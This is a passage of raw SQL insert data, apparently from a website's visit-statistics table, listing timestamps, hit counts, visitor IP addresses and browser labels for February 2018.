(206524,1518111260,1,1,0,0,'77.123.105.252','firefox'),(206525,1518111817,2,2,0,0,'162.210.196.97','other'),(206526,1518112624,1,1,0,0,'91.196.178.68','firefox'),(206527,1518112906,1,1,0,0,'91.209.11.236','other'),(206528,1518113606,1,1,0,0,'8.29.198.25','other'),(206529,1518114194,1,1,0,0,'178.154.200.8','other'),(206530,1518114580,1,1,0,0,'178.154.200.28','other'),(206531,1518114584,1,1,0,0,'37.9.113.100','other'),(206532,1518114875,1,0,1,0,'66.249.64.67',''),(206533,1518115918,2,2,0,0,'37.54.114.107','chrome'),(206534,1518116794,1,1,0,0,'40.77.167.125','other'),(206535,1518117553,1,0,1,0,'66.249.64.15',''),(206536,1518117611,1,0,1,0,'66.249.64.71',''),(206537,1518118273,1,1,0,0,'37.9.113.82','other'),(206538,1518118611,1,1,0,0,'66.249.64.73','chrome'),(206539,1518118616,1,1,0,0,'66.249.64.13','chrome'),(206540,1518118896,1,1,0,0,'141.8.142.50','other'),(206541,1518118900,1,1,0,0,'141.8.142.123','other'),(206542,1518119111,2,2,0,0,'138.201.146.154','chrome'),(206543,1518120662,1,1,0,0,'52.3.220.123','other'),(206544,1518120992,1,1,0,0,'40.77.167.16','other'),(206545,1518121645,1,1,0,0,'93.74.52.237','chrome'),(206546,1518122214,1,0,1,0,'66.249.64.71',''),(206547,1518124273,1,1,0,0,'66.249.64.15','chrome'),(206548,1518124282,1,1,0,0,'66.249.64.71','chrome'),(206549,1518124376,1,1,0,0,'94.178.38.30','chrome'),(206550,1518124422,1,1,0,0,'8.29.198.27','other'),(206551,1518124764,1,1,0,0,'95.108.181.111','other'),(206552,1518126122,1,0,1,0,'66.249.64.71',''),(206553,1518126222,28,28,0,0,'138.201.146.154','other'),(206554,1518126223,41,41,0,0,'138.201.146.154','msie'),(206556,1518126225,32,32,0,0,'138.201.146.154','chrome'),(206557,1518127694,1,0,1,0,'66.249.64.73',''),(206558,1518128273,1,1,0,0,'40.77.167.16','other'),(206559,1518128814,1,0,1,0,'66.249.64.73',''),(206560,1518129095,1,1,0,0,'5.45.207.30','other'),(206561,1518129231,1,1,0,0,'178.154.171.56','other'),(206562,1518129569,10,10,0,0,'173.249.13.106','other'),(206563,1518129643,1,1,0,0,'66.249.64.15','chrome'),(206564,1518129648,1,1,0,0,'66.249.64.73','chrome'),(206565,1518130048,2,0,2,0,'66.249.64.67',''),(206566,1518131602,1,1,0,0,'178.154.200.8','other'),(206567,1518132729,1,1,0,0,'157.55.39.199','other'),(206568,1518132756,1,0,1,0,'66.249.64.67',''),(206569,1518132974,1,0,1,0,'66.249.64.73',''),(206570,1518133692,1,0,1,0,'66.249.64.67',''),(206571,1518134311,1,1,0,0,'66.249.64.14','chrome'),(206572,1518134454,1,1,0,0,'66.249.64.73','chrome'),(206573,1518135126,1,1,0,0,'157.55.39.199','other'),(206574,1518135241,1,1,0,0,'8.29.198.27','other'),(206575,1518135922,1,0,1,0,'66.249.64.67',''),(206576,1518136511,1,1,0,0,'87.250.224.96','other'),(206577,1518137309,1,1,0,0,'52.3.220.123','other'),(206578,1518138103,1,1,0,0,'178.154.171.24','other'),(206579,1518139883,1,1,0,0,'157.55.39.199','other'),(206580,1518139908,1,1,0,0,'91.196.178.49','chrome'),(206581,1518141768,1,1,0,0,'66.249.64.71','chrome'),(206582,1518141870,2,2,0,0,'46.4.32.75','other'),(206583,1518141952,1,1,0,0,'95.108.181.111','other'),(206584,1518142763,1,1,0,0,'66.249.64.14','chrome'),(206585,1518142933,1,0,1,0,'66.249.64.71',''),(206586,1518143305,1,1,0,0,'40.77.167.83','other'),(206587,1518144022,1,0,1,0,'66.249.64.71',''),(206588,1518145827,1,1,0,0,'37.9.113.74','other'),(206589,1518146055,1,1,0,0,'8.29.198.26','other'),(206590,1518146753,1,1,0,0,'178.154.200.28','other'),(206591,1518147592,1,1,0,0,'66.249.64.73','chrome'),(206592,1518148976,1,1,0,0,'5.45.207.69','other'),(206593,1518149364,1,1,0,0,'66.249.64.13','chrome'),(206594,1518152256,1,1,0,0,'52.3.220.123','other'),(206595,1518152780,1,1,0,0,'141.8.142.126','other'),(206596,1518153309,1,1,0,0,'52.3.220.123','other'),(206597,1518153474,1,1,0,0,'66.249.64.67','chrome'),(206598,1518153766,1,0,1,0,'66.249.64.73',''),(206599,1518154214,1,1,0,0,'52.3.220.123','other'),(206600,1518155156,1,1,0,0,'66.249.64.13','chrome'),(206601,1518156209,1,1,0,0,'141.8.142.96','other'),(206602,1518156363,1,1,0,0,'157.55.39.199','other'),(206603,1518156870,1,1,0,0,'8.29.198.26','other'),(206604,1518156871,1,1,0,0,'157.55.39.178','other'),(206605,1518157379,1,1,0,0,'5.167.113.213','firefox'),(206606,1518157380,1,1,0,0,'128.72.107.149','other'),(206607,1518157744,1,0,1,0,'66.249.64.14',''),(206608,1518158206,1,1,0,0,'157.55.39.199','other'),(206609,1518158422,1,1,0,0,'37.9.113.186','other'),(206610,1518159058,1,0,1,0,'66.249.64.71',''),(206611,1518159182,1,1,0,0,'193.200.175.13','chrome'),(206612,1518159817,2,2,0,0,'91.196.178.74','chrome'),(206613,1518160073,1,1,0,0,'40.77.167.83','other'),(206614,1518160123,1,1,0,0,'91.196.178.162','chrome'),(206615,1518160360,1,1,0,0,'91.209.11.236','other'),(206616,1518160410,1,1,0,0,'66.249.64.13','chrome'),(206617,1518160958,1,1,0,0,'188.230.43.254','other'),(206618,1518161032,1,1,0,0,'37.9.113.56','other'),(206619,1518162534,1,1,0,0,'37.55.43.83','chrome'),(206620,1518163215,1,1,0,0,'82.207.49.98','chrome'),(206621,1518163378,1,1,0,0,'188.230.43.254','other'),(206622,1518163973,1,1,0,0,'176.120.99.195','chrome'),(206623,1518164273,2,2,0,0,'91.196.178.89','chrome'),(206624,1518164278,1,1,0,0,'91.196.178.136','chrome'),(206625,1518164512,1,1,0,0,'13.56.229.65','chrome'),(206626,1518164729,2,2,0,0,'91.196.178.74','firefox'),(206627,1518165260,2,2,0,0,'195.230.119.34','chrome'),(206628,1518165544,1,1,0,0,'91.196.178.163','chrome'),(206629,1518165764,2,2,0,0,'78.111.185.35','chrome'),(206630,1518166321,1,1,0,0,'91.196.178.72','firefox'),(206631,1518166382,1,1,0,0,'178.93.200.139','firefox'),(206632,1518166679,1,1,0,0,'66.249.64.13','chrome'),(206633,1518166694,1,1,0,0,'91.196.178.100','chrome'),(206634,1518166760,1,1,0,0,'40.77.167.83','other'),(206635,1518166947,1,1,0,0,'92.112.125.243','chrome'),(206636,1518167688,1,1,0,0,'8.29.198.27','other'),(206637,1518167981,1,0,1,0,'66.249.64.73',''),(206638,1518168432,1,1,0,0,'95.132.27.175','firefox'),(206639,1518168712,1,1,0,0,'87.250.224.125','other'),(206640,1518169002,1,1,0,0,'37.52.23.86','firefox'),(206641,1518169296,1,1,0,0,'66.249.64.67','chrome'),(206642,1518169756,2,2,0,0,'91.196.178.89','chrome'),(206643,1518170044,1,1,0,0,'91.196.178.72','firefox'),(206644,1518170355,1,1,0,0,'188.231.244.35','chrome'),(206645,1518170400,1,1,0,0,'192.187.101.178','firefox'),(206646,1518170414,1,1,0,0,'37.52.23.86','firefox'),(206647,1518170618,1,1,0,0,'92.112.125.243','chrome'),(206648,1518171162,1,1,0,0,'66.249.64.15','chrome'),(206649,1518171396,1,1,0,0,'62.80.185.138','chrome'),(206650,1518171721,13,13,0,0,'23.237.4.26','other'),(206651,1518171876,2,1,1,0,'66.249.64.71',''),(206652,1518172131,1,0,1,0,'66.249.64.73',''),(206653,1518172424,1,1,0,0,'178.154.171.88','other'),(206654,1518172450,1,1,0,0,'37.73.224.63','chrome'),(206655,1518172628,1,0,1,0,'66.249.64.67',''),(206656,1518173058,1,1,0,0,'91.196.178.136','chrome'),(206657,1518173895,1,1,0,0,'91.219.252.187','firefox'),(206658,1518174512,1,1,0,0,'91.196.178.92','firefox'),(206659,1518174922,1,1,0,0,'66.249.64.67','chrome'),(206660,1518176068,3,3,0,0,'178.238.224.129','other'),(206661,1518176316,3,3,0,0,'46.219.33.172','chrome'),(206662,1518176605,1,1,0,0,'66.249.64.13','chrome'),(206663,1518176680,1,1,0,0,'94.178.136.111','chrome'),(206664,1518176848,1,1,0,0,'178.154.171.88','other'),(206665,1518176912,2,0,2,0,'66.249.64.67',''),(206666,1518177566,1,0,1,0,'66.249.64.71',''),(206667,1518177898,1,1,0,0,'95.135.177.130','opera'),(206668,1518178154,1,0,1,0,'66.249.64.73',''),(206669,1518178531,1,1,0,0,'8.29.198.27','other'),(206670,1518179157,1,1,0,0,'37.55.43.83','chrome'),(206671,1518181511,1,1,0,0,'178.154.171.88','other'),(206672,1518182057,1,1,0,0,'178.92.137.206','chrome'),(206673,1518182333,1,1,0,0,'195.10.210.70','chrome'),(206674,1518182992,1,0,1,0,'66.249.64.14',''),(206675,1518183200,2,2,0,0,'91.196.178.75','chrome'),(206676,1518183547,2,2,0,0,'195.200.64.79','chrome'),(206677,1518183701,1,1,0,0,'194.213.23.99','chrome'),(206678,1518184134,2,2,0,0,'213.108.41.211','chrome'),(206679,1518184342,1,1,0,0,'91.196.178.133','firefox'),(206680,1518184513,3,3,0,0,'212.90.62.4','chrome'),(206681,1518184604,1,1,0,0,'157.55.39.178','other'),(206682,1518186169,1,1,0,0,'188.230.43.254','other'),(206683,1518186429,2,2,0,0,'46.219.254.43','chrome'),(206684,1518187997,1,1,0,0,'40.77.167.16','other'),(206685,1518189352,2,2,0,0,'199.58.86.211','other'),(206686,1518189356,1,1,0,0,'8.29.198.25','other'),(206687,1518190037,1,1,0,0,'157.55.39.199','other'),(206688,1518190268,1,0,1,0,'66.249.64.14',''),(206689,1518190621,1,0,1,0,'66.249.64.67',''),(206690,1518191066,2,2,0,0,'141.8.142.74','other'),(206691,1518191437,1,1,0,0,'46.211.145.247','chrome'),(206692,1518191831,1,1,0,0,'157.55.39.178','other'),(206693,1518192446,1,0,1,0,'66.249.64.73',''),(206694,1518193153,1,1,0,0,'178.154.171.81','other'),(206695,1518193567,1,1,0,0,'40.77.167.16','other'),(206696,1518193569,1,1,0,0,'157.55.39.199','other'),(206697,1518193712,1,1,0,0,'40.77.167.83','other'),(206698,1518193993,1,1,0,0,'91.196.178.73','chrome'),(206699,1518195221,1,1,0,0,'87.250.224.46','other'),(206700,1518195234,1,1,0,0,'188.230.43.254','other'),(206701,1518195668,3,3,0,0,'144.76.8.134','other'),(206702,1518196174,2,2,0,0,'37.54.114.107','chrome'),(206703,1518196489,2,2,0,0,'37.53.123.170','chrome'),(206704,1518197129,1,1,0,0,'37.9.113.101','other'),(206705,1518197454,1,1,0,0,'188.230.43.254','other'),(206706,1518197944,1,0,1,0,'66.249.64.73',''),(206707,1518198331,1,1,0,0,'157.55.39.178','other'),(206708,1518198337,1,1,0,0,'40.77.167.16','other'),(206709,1518198818,1,1,0,0,'37.9.113.74','other'),(206710,1518199310,1,1,0,0,'37.9.113.110','other'),(206711,1518199314,1,1,0,0,'141.8.142.126','other'),(206712,1518199439,1,1,0,0,'188.230.43.254','other'),(206713,1518200183,1,1,0,0,'8.29.198.25','other'),(206714,1518200206,2,2,0,0,'91.196.178.166','chrome'),(206715,1518200255,1,1,0,0,'180.76.15.162','other'),(206716,1518200724,1,1,0,0,'66.249.64.15','chrome'),(206717,1518201258,1,1,0,0,'5.45.207.30','other'),(206718,1518201354,1,1,0,0,'37.9.113.63','other'),(206719,1518201836,1,1,0,0,'188.230.43.254','other'),(206720,1518202249,1,1,0,0,'87.250.224.96','other'),(206721,1518203499,1,1,0,0,'157.55.39.178','other'),(206722,1518203501,1,1,0,0,'173.208.157.186','other'),(206723,1518203673,1,0,1,0,'66.249.64.73',''),(206724,1518203792,1,1,0,0,'178.154.171.60','other'),(206725,1518204234,1,1,0,0,'188.230.43.254','other'),(206726,1518204453,1,1,0,0,'157.55.39.199','other'),(206727,1518204961,1,1,0,0,'178.154.200.28','other'),(206728,1518204968,1,1,0,0,'66.249.64.67','chrome'),(206729,1518205127,1,1,0,0,'178.154.171.10','other'),(206730,1518207082,1,1,0,0,'66.249.64.14','chrome'),(206731,1518207159,1,1,0,0,'157.55.39.199','other'),(206732,1518207378,1,0,1,0,'66.249.64.73',''),(206733,1518207732,1,1,0,0,'37.9.113.115','other'),(206734,1518208734,1,1,0,0,'185.35.11.243','firefox'),(206735,1518209539,1,0,1,0,'66.249.64.73',''),(206736,1518210734,1,1,0,0,'180.76.15.141','other'),(206737,1518210998,1,1,0,0,'8.29.198.26','other'),(206738,1518213182,1,1,0,0,'91.209.11.236','other'),(206739,1518214743,1,1,0,0,'37.9.113.138','other'),(206740,1518215014,1,1,0,0,'213.180.203.7','other'),(206741,1518215407,1,1,0,0,'40.77.167.126','other'),(206742,1518215833,1,1,0,0,'185.92.223.178','chrome'),(206743,1518220690,1,0,1,0,'66.249.64.67',''),(206744,1518221109,1,1,0,0,'66.249.64.15','chrome'),(206745,1518221597,1,0,1,0,'66.249.64.67',''),(206746,1518221824,1,1,0,0,'8.29.198.25','other'),(206747,1518226437,1,1,0,0,'87.250.224.46','other'),(206748,1518226459,1,1,0,0,'141.8.142.74','other'),(206749,1518226473,1,1,0,0,'166.48.105.143','firefox'),(206750,1518228399,1,0,1,0,'66.249.64.67',''),(206751,1518229577,1,1,0,0,'66.249.64.71','chrome'),(206752,1518232652,1,1,0,0,'8.29.198.25','other'),(206753,1518232769,1,1,0,0,'193.70.34.209','chrome'),(206754,1518233080,1,1,0,0,'213.180.203.7','other'),(206755,1518233192,1,0,1,0,'66.249.64.14',''),(206756,1518233535,1,1,0,0,'157.55.39.42','other'),(206757,1518233776,1,1,0,0,'178.154.171.4','other'),(206758,1518234420,1,1,0,0,'107.167.105.178','other'),(206759,1518235216,1,1,0,0,'178.154.171.4','other'),(206760,1518236073,1,1,0,0,'37.9.113.60','other'),(206761,1518236713,1,0,1,0,'66.249.64.71',''),(206762,1518239133,1,1,0,0,'91.209.11.236','other'),(206763,1518239357,1,1,0,0,'46.119.115.251','chrome'),(206764,1518241585,1,1,0,0,'178.154.200.8','other'),(206765,1518241956,1,1,0,0,'40.77.167.123','other'),(206766,1518242644,1,1,0,0,'37.9.113.132','other'),(206767,1518242662,1,1,0,0,'40.77.167.122','other'),(206768,1518243473,1,1,0,0,'8.29.198.26','other'),(206769,1518245071,1,1,0,0,'141.8.142.29','other'),(206770,1518245227,1,1,0,0,'66.249.64.67','chrome'),(206771,1518245351,2,2,0,0,'178.154.171.55','other'),(206772,1518246098,1,1,0,0,'46.149.83.248','firefox'),(206773,1518246304,1,1,0,0,'178.154.171.88','other'),(206774,1518246958,1,1,0,0,'40.77.167.120','other'),(206775,1518247228,1,1,0,0,'87.250.224.77','other'),(206776,1518247231,1,1,0,0,'141.8.142.74','other'),(206777,1518250038,1,1,0,0,'37.9.113.115','other'),(206778,1518250436,1,1,0,0,'178.154.171.10','other'),(206779,1518252335,2,2,0,0,'54.165.59.7','other'),(206780,1518252412,1,0,1,0,'66.249.64.67',''),(206781,1518253337,9,9,0,0,'195.154.230.226','other'),(206782,1518253587,1,1,0,0,'94.179.129.148','firefox'),(206783,1518254310,1,1,0,0,'8.29.198.25','other'),(206784,1518256522,1,1,0,0,'157.55.39.125','other'),(206785,1518256571,1,0,1,0,'66.249.64.67',''),(206786,1518256630,1,1,0,0,'141.8.142.74','other'),(206787,1518257108,2,2,0,0,'54.165.59.7','other'),(206788,1518257828,1,0,1,0,'66.249.64.73',''),(206789,1518257882,1,1,0,0,'178.154.171.4','other'),(206790,1518257947,1,1,0,0,'141.8.132.19','other'),(206791,1518258103,1,1,0,0,'37.9.113.157','other'),(206792,1518258142,1,1,0,0,'37.204.103.82','other'),(206793,1518258279,1,1,0,0,'5.45.207.58','other'),(206794,1518258656,1,1,0,0,'37.9.113.182','other'),(206795,1518258735,1,1,0,0,'195.54.42.20','chrome'),(206796,1518258774,1,1,0,0,'141.8.132.22','other'),(206797,1518259999,1,1,0,0,'141.8.142.74','other'),(206798,1518260439,1,1,0,0,'180.76.15.156','other'),(206799,1518261483,1,1,0,0,'141.8.142.74','other'),(206800,1518262405,1,1,0,0,'37.9.113.115','other'),(206801,1518262605,2,2,0,0,'37.54.114.107','chrome'),(206802,1518262629,1,0,1,0,'66.249.64.15',''),(206803,1518263790,2,2,0,0,'37.54.114.107','chrome'),(206804,1518263814,1,1,0,0,'157.55.39.125','other'),(206805,1518265140,1,1,0,0,'8.29.198.25','other'),(206806,1518265777,1,1,0,0,'40.77.167.121','other'),(206807,1518266839,2,2,0,0,'141.8.142.74','other'),(206808,1518267586,1,1,0,0,'37.9.113.100','other'),(206809,1518267690,1,1,0,0,'216.244.66.237','other'),(206810,1518267892,1,1,0,0,'180.76.15.162','other'),(206811,1518268622,1,0,1,0,'66.249.64.71',''),(206812,1518269100,1,1,0,0,'37.9.113.134','other'),(206813,1518269419,1,1,0,0,'5.45.207.58','other'),(206814,1518271273,2,2,0,0,'141.8.142.74','other'),(206815,1518271428,1,1,0,0,'178.154.171.88','other'),(206816,1518271639,1,1,0,0,'54.165.59.7','other'),(206817,1518272340,1,1,0,0,'66.249.64.13','chrome'),(206818,1518272531,1,1,0,0,'178.154.171.55','other'),(206819,1518272910,1,1,0,0,'40.77.167.122','other'),(206820,1518273705,1,0,1,0,'66.249.64.67',''),(206821,1518274351,1,1,0,0,'141.8.142.74','other'),(206822,1518274805,1,1,0,0,'178.154.171.60','other'),(206823,1518275308,2,2,0,0,'162.210.196.98','other'),(206824,1518275780,1,1,0,0,'87.250.224.46','other'),(206825,1518275784,2,2,0,0,'141.8.142.74','other'),(206826,1518275978,1,1,0,0,'8.29.198.26','other'),(206827,1518276797,1,1,0,0,'178.154.171.88','other'),(206828,1518277331,1,1,0,0,'188.230.43.254','other'),(206829,1518277651,1,1,0,0,'141.8.142.74','other'),(206830,1518277842,1,0,1,0,'66.249.64.71',''),(206831,1518277884,1,1,0,0,'93.75.8.57','firefox'),(206832,1518278047,1,1,0,0,'87.250.224.46','other'),(206833,1518278096,1,1,0,0,'91.209.11.236','other'),(206834,1518278238,1,1,0,0,'40.77.167.123','other'),(206835,1518279092,1,1,0,0,'188.230.43.254','other'),(206836,1518279403,1,1,0,0,'178.154.171.88','other'),(206837,1518279777,1,0,1,0,'66.249.64.71',''),(206838,1518280050,1,0,1,0,'66.249.64.67',''),(206839,1518281571,2,2,0,0,'141.8.142.74','other'),(206840,1518281726,1,1,0,0,'40.77.167.122','other'),(206841,1518282702,2,2,0,0,'40.77.167.123','other'),(206842,1518283431,1,1,0,0,'178.154.171.88','other'),(206843,1518283940,1,1,0,0,'216.244.66.237','other'),(206844,1518283999,2,2,0,0,'207.46.13.17','other'),(206845,1518284670,2,2,0,0,'37.73.178.225','chrome'),(206846,1518286818,1,1,0,0,'8.29.198.26','other'),(206847,1518287449,1,1,0,0,'180.76.15.150','other'),(206848,1518287553,1,1,0,0,'40.77.167.123','other'),(206849,1518288256,1,1,0,0,'74.115.214.146','other'),(206850,1518289545,1,0,1,0,'66.249.64.67',''),(206851,1518289923,1,1,0,0,'178.154.200.32','other'),(206852,1518290326,1,1,0,0,'46.211.108.67','other'),(206853,1518290396,1,1,0,0,'37.9.113.101','other'),(206854,1518290464,1,1,0,0,'178.154.171.60','other'),(206855,1518291593,1,0,1,0,'66.249.64.71',''),(206856,1518292351,1,1,0,0,'188.230.43.254','other'),(206857,1518293048,1,1,0,0,'107.167.106.195','other'),(206858,1518293173,1,1,0,0,'91.224.178.70','chrome'),(206859,1518293611,1,0,1,0,'66.249.64.13',''),(206860,1518293667,1,1,0,0,'37.9.113.132','other'),(206861,1518294658,1,1,0,0,'216.244.66.237','other'),(206862,1518294942,1,0,1,0,'66.249.64.73',''),(206863,1518294986,1,1,0,0,'91.196.178.81','firefox'),(206864,1518297215,1,1,0,0,'5.45.207.49','other'),(206865,1518297374,1,1,0,0,'128.72.209.129','chrome'),(206866,1518297375,1,1,0,0,'37.145.30.147','chrome'),(206867,1518297652,1,1,0,0,'8.29.198.25','other'),(206868,1518297972,1,1,0,0,'37.9.113.100','other'),(206869,1518299424,1,1,0,0,'178.154.171.88','other'),(206870,1518300312,1,1,0,0,'141.8.132.22','other'),(206871,1518301228,1,1,0,0,'5.45.207.82','other'),(206872,1518303489,1,1,0,0,'40.77.167.123','other'),(206873,1518303648,1,1,0,0,'178.154.171.88','other'),(206874,1518303732,1,1,0,0,'213.180.203.8','other'),(206875,1518303736,1,1,0,0,'178.154.171.81','other'),(206876,1518304312,1,1,0,0,'157.55.39.125','other'),(206877,1518304335,1,1,0,0,'66.249.64.73','chrome'),(206878,1518304448,1,0,1,0,'66.249.64.71',''),(206879,1518304633,1,1,0,0,'54.165.59.7','other'),(206880,1518305286,1,0,1,0,'66.249.64.67',''),(206881,1518305364,1,1,0,0,'141.8.132.19','other'),(206882,1518305721,2,2,0,0,'37.9.113.138','other'),(206883,1518305940,1,1,0,0,'216.244.66.237','other'),(206884,1518307338,1,0,1,0,'66.249.64.67',''),(206885,1518307559,1,1,0,0,'216.244.66.237','other'),(206886,1518308178,5,5,0,0,'174.138.12.136','other'),(206887,1518308200,1,1,0,0,'91.209.11.236','other'),(206888,1518308507,1,1,0,0,'8.29.198.27','other'),(206889,1518309014,1,0,1,0,'66.249.64.71',''),(206890,1518310044,1,1,0,0,'46.211.97.148','chrome'),(206891,1518310293,1,0,1,0,'66.249.64.71',''),(206892,1518311815,1,1,0,0,'178.154.171.55','other'),(206893,1518311862,1,1,0,0,'37.9.113.110','other'),(206894,1518312246,1,1,0,0,'157.55.39.125','other'),(206895,1518313264,1,0,1,0,'66.249.64.73',''),(206896,1518313702,1,1,0,0,'178.154.171.60','other'),(206897,1518314740,1,0,1,0,'66.249.64.71',''),(206898,1518315499,1,1,0,0,'178.154.171.81','other'),(206899,1518315803,1,1,0,0,'141.8.142.74','other'),(206900,1518315806,1,1,0,0,'37.9.113.138','other'),(206901,1518316222,1,1,0,0,'178.154.171.55','other'),(206902,1518317819,1,1,0,0,'141.8.132.19','other'),(206903,1518317895,1,1,0,0,'94.180.4.105','chrome'),(206904,1518318121,2,2,0,0,'178.154.171.88','other'),(206905,1518319360,1,1,0,0,'8.29.198.25','other'),(206906,1518319660,1,1,0,0,'204.79.180.10','msie'),(206907,1518320627,1,1,0,0,'66.249.64.13','chrome'),(206908,1518321086,1,1,0,0,'5.45.207.58','other'),(206909,1518321670,1,1,0,0,'37.9.113.157','other'),(206910,1518321953,1,1,0,0,'141.8.132.19','other'),(206911,1518322437,1,1,0,0,'213.180.203.8','other'),(206912,1518322546,1,0,1,0,'66.249.64.71',''),(206913,1518323162,1,1,0,0,'74.115.214.129','other'),(206914,1518323292,1,1,0,0,'178.154.171.88','other'),(206915,1518323700,2,2,0,0,'141.8.142.74','other'),(206916,1518325075,1,1,0,0,'216.244.66.237','other'),(206917,1518325206,1,0,1,0,'66.249.64.71',''),(206918,1518326697,1,1,0,0,'40.77.167.42','other'),(206919,1518327283,1,1,0,0,'91.209.11.236','other'),(206920,1518327693,1,1,0,0,'5.228.129.95','msie'),(206921,1518327742,1,1,0,0,'5.167.184.182','msie'),(206922,1518327753,1,1,0,0,'40.77.167.135','other'),(206923,1518329795,1,0,1,0,'66.249.64.13',''),(206924,1518329934,1,1,0,0,'178.154.171.55','other'),(206925,1518330128,1,1,0,0,'91.209.11.236','other'),(206926,1518330198,1,1,0,0,'8.29.198.25','other'),(206927,1518330354,1,0,1,0,'66.249.64.71',''),(206928,1518332956,1,1,0,0,'37.9.113.182','other'),(206929,1518333081,1,0,1,0,'66.249.64.73',''),(206930,1518335807,1,1,0,0,'37.9.113.100','other'),(206931,1518335826,1,1,0,0,'66.249.93.204','chrome'),(206932,1518336148,1,0,1,0,'66.249.64.73',''),(206933,1518336185,2,2,0,0,'37.54.114.107','chrome'),(206934,1518336880,1,0,1,0,'66.249.64.71',''),(206935,1518337247,1,1,0,0,'178.154.171.88','other'),(206936,1518339996,1,1,0,0,'40.77.167.135','other'),(206937,1518340227,1,1,0,0,'178.54.32.43','msie'),(206938,1518341043,1,1,0,0,'8.29.198.26','other'),(206939,1518341914,1,1,0,0,'91.196.178.52','chrome'),(206940,1518342189,1,1,0,0,'141.8.142.74','other'),(206941,1518343919,1,1,0,0,'40.77.167.44','other'),(206942,1518344000,1,0,1,0,'66.249.64.14',''),(206943,1518344190,1,0,1,0,'66.249.64.73',''),(206944,1518344700,17,17,0,0,'204.12.208.10','other'),(206945,1518345207,1,1,0,0,'216.244.66.237','other'),(206946,1518345788,1,1,0,0,'180.76.15.9','other'),(206947,1518345847,1,1,0,0,'37.9.113.110','other'),(206948,1518346471,1,1,0,0,'54.37.158.84','other'),(206949,1518347562,1,1,0,0,'46.118.155.165','chrome'),(206950,1518348418,1,1,0,0,'185.156.172.131','firefox'),(206951,1518349217,1,1,0,0,'84.21.113.74','firefox'),(206952,1518349788,1,1,0,0,'180.76.15.18','other'),(206953,1518350746,1,1,0,0,'195.69.222.18','firefox'),(206954,1518350811,1,1,0,0,'37.9.113.115','other'),(206955,1518351172,2,2,0,0,'37.54.114.107','chrome'),(206956,1518351705,1,1,0,0,'40.77.167.44','other'),(206957,1518351890,1,1,0,0,'8.29.198.26','other'),(206958,1518352179,1,1,0,0,'40.77.167.42','other'),(206959,1518352552,1,1,0,0,'87.250.224.46','other'),(206960,1518352955,1,1,0,0,'66.249.64.71','chrome'),(206961,1518353350,1,0,1,0,'66.249.64.67',''),(206962,1518354204,1,1,0,0,'40.77.167.81','other'),(206963,1518354755,1,1,0,0,'40.77.167.42','other'),(206964,1518355062,2,2,0,0,'91.196.178.57','chrome'),(206965,1518355845,1,1,0,0,'178.251.111.36','chrome'),(206966,1518357123,1,1,0,0,'91.196.178.57','chrome'),(206967,1518359209,1,1,0,0,'66.249.64.14','chrome'),(206968,1518361116,1,1,0,0,'40.77.167.135','other'),(206969,1518362152,1,1,0,0,'91.196.178.87','opera'),(206970,1518362738,1,1,0,0,'8.29.198.27','other'),(206971,1518363193,1,1,0,0,'40.77.167.135','other'),(206972,1518364129,1,1,0,0,'40.77.167.135','other'),(206973,1518364993,1,0,1,0,'66.249.64.67',''),(206974,1518365598,1,1,0,0,'66.249.64.13','chrome'),(206975,1518365959,1,1,0,0,'216.244.66.237','other'),(206976,1518366082,1,1,0,0,'40.77.167.42','other'),(206977,1518366185,1,1,0,0,'217.69.143.217','firefox'),(206978,1518366432,1,1,0,0,'107.167.109.157','other'),(206979,1518366540,2,2,0,0,'40.77.167.135','other'),(206980,1518367483,1,1,0,0,'178.150.235.42','other'),(206981,1518369145,1,0,1,0,'66.249.64.71',''),(206982,1518370847,2,2,0,0,'91.196.178.40','chrome'),(206983,1518370883,1,1,0,0,'40.77.167.42','other'),(206984,1518372149,1,1,0,0,'40.77.167.42','other'),(206985,1518373587,1,1,0,0,'8.29.198.27','other'),(206986,1518373606,1,1,0,0,'176.113.170.104','firefox'),(206987,1518373900,1,0,1,0,'66.249.64.73',''),(206988,1518375037,1,0,1,0,'66.249.64.73',''),(206989,1518375290,1,0,1,0,'66.249.64.71',''),(206990,1518375361,1,1,0,0,'40.77.167.44','other'),(206991,1518377918,1,1,0,0,'141.8.132.22','other'),(206992,1518377943,1,1,0,0,'141.8.142.29','other'),(206993,1518377954,1,1,0,0,'178.154.171.60','other'),(206994,1518377961,1,1,0,0,'87.250.224.125','other'),(206995,1518378265,1,1,0,0,'193.160.224.4','firefox'),(206996,1518378860,1,0,1,0,'66.249.64.73',''),(206997,1518379825,2,0,2,0,'66.249.64.67',''),(206998,1518379919,1,0,1,0,'66.249.64.73',''),(206999,1518380314,1,1,0,0,'141.8.142.29','other'),(207000,1518380415,1,1,0,0,'37.191.8.115','chrome'),(207001,1518380445,1,0,1,0,'66.249.64.13',''),(207002,1518381429,1,1,0,0,'37.115.69.75','other'),(207003,1518381908,1,1,0,0,'216.244.66.237','other'),(207004,1518381966,1,1,0,0,'46.211.98.231','chrome'),(207005,1518382219,1,1,0,0,'40.77.167.81','other'),(207006,1518382859,1,1,0,0,'40.77.167.44','other'),(207007,1518383130,1,0,1,0,'66.249.64.14',''),(207008,1518384432,1,1,0,0,'8.29.198.25','other'),(207009,1518385342,1,0,1,0,'66.249.64.71',''),(207010,1518385665,1,1,0,0,'66.249.64.67','chrome'),(207011,1518386031,1,1,0,0,'40.77.167.44','other'),(207012,1518387174,1,1,0,0,'40.77.167.44','other'),(207013,1518388269,1,0,1,0,'66.249.64.71',''),(207014,1518389129,1,1,0,0,'216.244.66.237','other'),(207015,1518390667,1,1,0,0,'199.58.86.209','other'),(207016,1518391473,1,0,1,0,'66.249.64.67',''),(207017,1518392059,1,1,0,0,'66.249.64.67','chrome'),(207018,1518392788,1,1,0,0,'46.161.9.39','chrome'),(207019,1518392814,1,1,0,0,'40.77.167.44','other'),(207020,1518393111,1,0,1,0,'66.249.64.73',''),(207021,1518393806,1,0,1,0,'66.249.64.67',''),(207022,1518393866,1,1,0,0,'40.77.167.135','other'),(207023,1518395272,1,1,0,0,'8.29.198.26','other'),(207024,1518395695,1,1,0,0,'66.249.64.71','chrome'),(207025,1518399359,1,1,0,0,'46.242.72.2','msie'),(207026,1518400329,1,0,1,0,'66.249.64.14',''),(207027,1518400715,1,1,0,0,'95.84.139.43','msie'),(207028,1518400718,1,1,0,0,'5.228.24.162','msie'),(207029,1518400720,1,1,0,0,'5.228.58.80','msie'),(207031,1518400722,1,1,0,0,'93.80.235.228','msie'),(207032,1518400723,1,1,0,0,'195.91.224.113','msie'),(207033,1518400724,1,1,0,0,'77.37.221.119','msie'),(207034,1518400726,1,1,0,0,'188.32.6.49','msie'),(207035,1518400728,1,1,0,0,'176.193.128.178','msie'),(207036,1518401374,1,0,1,0,'66.249.6